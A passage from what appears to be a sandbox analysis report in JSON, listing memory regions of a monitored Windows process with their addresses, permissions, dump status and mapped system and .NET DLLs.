], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_598", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:00.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_599", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:00.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_600", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:00.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_601", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:00.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_602", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:00.278", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000603-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_603", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000604-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_604", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_605", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2322431, "entry_point": 0, "filename": null, "id": "region_606", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2367487, "entry_point": 0, "filename": null, "id": "region_607", "name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000608-addr_0x0000000000430000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000609-addr_0x00000000005e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_99", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6225919, "entry_point": 0, "filename": null, "id": "region_609", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7831551, "entry_point": 0, "filename": null, "id": "region_610", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 9441279, "entry_point": 0, "filename": null, "id": "region_611", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 30474239, "entry_point": 0, "filename": null, "id": "region_612", "name": "pagefile_0x0000000000910000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9502720, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 33419263, "entry_point": 30474240, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_613", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30474240, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 37564415, "entry_point": 0, "filename": null, "id": "region_614", "name": "pagefile_0x0000000001fe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33423360, "timestamp": "00:01:00.363", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000615-addr_0x000000006fff0000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_100", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1878982656, "type": "region", "version": 1 }, "end_va": 1879048191, "entry_point": 0, "filename": null, "id": "region_615", "name": "private_0x000000006fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1878982656, "timestamp": "00:01:00.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791679696896, "type": "region", "version": 1 }, "end_va": 8791679709183, "entry_point": 8791679696896, "filename": "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_616", "name": "api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791679696896, "timestamp": "00:01:00.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_617", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:00.370", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_618", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:00.371", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000619-addr_0x000007fefd9c0000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_101", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791757946880, "type": "region", "version": 1 }, "end_va": 8791758012415, "entry_point": 0, "filename": null, "id": "region_619", "name": "private_0x000007fefd9c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791757946880, "timestamp": "00:01:00.381", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000620-addr_0x0000000000380000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_102", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_620", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:00.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3878911, "entry_point": 3735552, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\cscompui.dll", "id": "region_621", "name": "cscompui.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\1033\\cscompui.dll", "region_type": "memory_mapped_file", "start_va": 3735552, "timestamp": "00:01:00.459", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000622-addr_0x00000000023e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_103", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 37617664, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 0, "filename": null, "id": "region_622", "name": "private_0x00000000023e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37617664, "timestamp": "00:01:00.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000623-addr_0x00000000025a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_104", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 39452672, "type": "region", "version": 1 }, "end_va": 39518207, "entry_point": 0, "filename": null, "id": "region_623", "name": "private_0x00000000025a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39452672, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000624-addr_0x00000000025b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_105", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 40566783, "entry_point": 0, "filename": null, "id": "region_624", "name": "private_0x00000000025b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39518208, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000625-addr_0x0000000002860000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42860543, "entry_point": 0, "filename": null, "id": "region_625", "name": "private_0x0000000002860000", "norm_filename": null, "region_type": "private_memory", "start_va": 42336256, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_626", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_627", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:00.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_628", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:01:00.486", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000629-addr_0x00000000027a0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 42074111, "entry_point": 0, "filename": null, "id": "region_629", "name": "private_0x00000000027a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41549824, "timestamp": "00:01:00.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_630", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:00.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_631", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:00.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3543039, "entry_point": 0, "filename": null, "id": "region_632", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:01:00.537", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000633-addr_0x0000000002700000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_633", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:01:00.537", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000634-addr_0x0000000002980000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43515904, "type": "region", "version": 1 }, "end_va": 44040191, "entry_point": 0, "filename": null, "id": "region_634", "name": "private_0x0000000002980000", "norm_filename": null, "region_type": "private_memory", "start_va": 43515904, "timestamp": "00:01:00.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000635-addr_0x0000000002a00000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 44040192, "type": "region", "version": 1 }, "end_va": 48234495, "entry_point": 0, "filename": null, "id": "region_635", "name": "private_0x0000000002a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 44040192, "timestamp": "00:01:00.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000636-addr_0x0000000002f10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 49348608, "type": "region", "version": 1 }, "end_va": 49872895, "entry_point": 0, "filename": null, "id": "region_636", "name": "private_0x0000000002f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 49348608, "timestamp": "00:01:00.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000637-addr_0x0000000002f90000-size_0x0000000000200000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 49872896, "type": "region", "version": 1 }, "end_va": 51970047, "entry_point": 0, "filename": null, "id": "region_637", "name": "private_0x0000000002f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 49872896, "timestamp": "00:01:00.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 24100470784, "type": "region", "version": 1 }, "end_va": 24100614143, "entry_point": 24100470784, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\alink.dll", "id": "region_638", "name": "alink.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\alink.dll", "region_type": "memory_mapped_file", "start_va": 24100470784, "timestamp": "00:01:00.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3608575, "entry_point": 0, "filename": null, "id": "region_639", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:01:00.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_640", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:00.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_641", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:00.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_642", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:00.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_643", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:00.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_644", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:01.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 303104, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5742591, "entry_point": 5439488, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Runtime.Remoting.dll", "id": "region_645", "name": "system.runtime.remoting.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.runtime.remoting.dll", "region_type": "memory_mapped_file", "start_va": 5439488, "timestamp": "00:01:01.652", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000646-addr_0x0000000002e00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_113", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 48234496, "type": "region", "version": 1 }, "end_va": 49283071, "entry_point": 0, "filename": null, "id": "region_646", "name": "private_0x0000000002e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 48234496, "timestamp": "00:01:01.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3190784, "start_va": 51970048, "type": "region", "version": 1 }, "end_va": 55160831, "entry_point": 51970048, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.dll", "id": "region_647", "name": "system.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.dll", "region_type": "memory_mapped_file", "start_va": 51970048, "timestamp": "00:01:01.661", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3096576, "start_va": 55181312, "type": "region", "version": 1 }, "end_va": 58277887, "entry_point": 55181312, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Data.dll", "id": "region_648", "name": "system.data.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.data.dll", "region_type": "memory_mapped_file", "start_va": 55181312, "timestamp": "00:01:01.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2048000, "start_va": 58327040, "type": "region", "version": 1 }, "end_va": 60375039, "entry_point": 58327040, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.XML.dll", "id": "region_649", "name": "system.xml.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.xml.dll", "region_type": "memory_mapped_file", "start_va": 58327040, "timestamp": "00:01:01.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 839680, "start_va": 60424192, "type": "region", "version": 1 }, "end_va": 61263871, "entry_point": 60424192, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Web.Services.dll", "id": "region_650", "name": "system.web.services.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.web.services.dll", "region_type": "memory_mapped_file", "start_va": 60424192, "timestamp": "00:01:01.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4567040, "start_va": 61276160, "type": "region", "version": 1 }, "end_va": 65843199, "entry_point": 61276160, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", "id": "region_651", "name": "mscorlib.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", "region_type": "memory_mapped_file", "start_va": 61276160, "timestamp": "00:01:01.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 180224, "start_va": 8791557865472, "type": "region", "version": 1 }, "end_va": 8791558045695, "entry_point": 8791557865472, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorpe.dll", 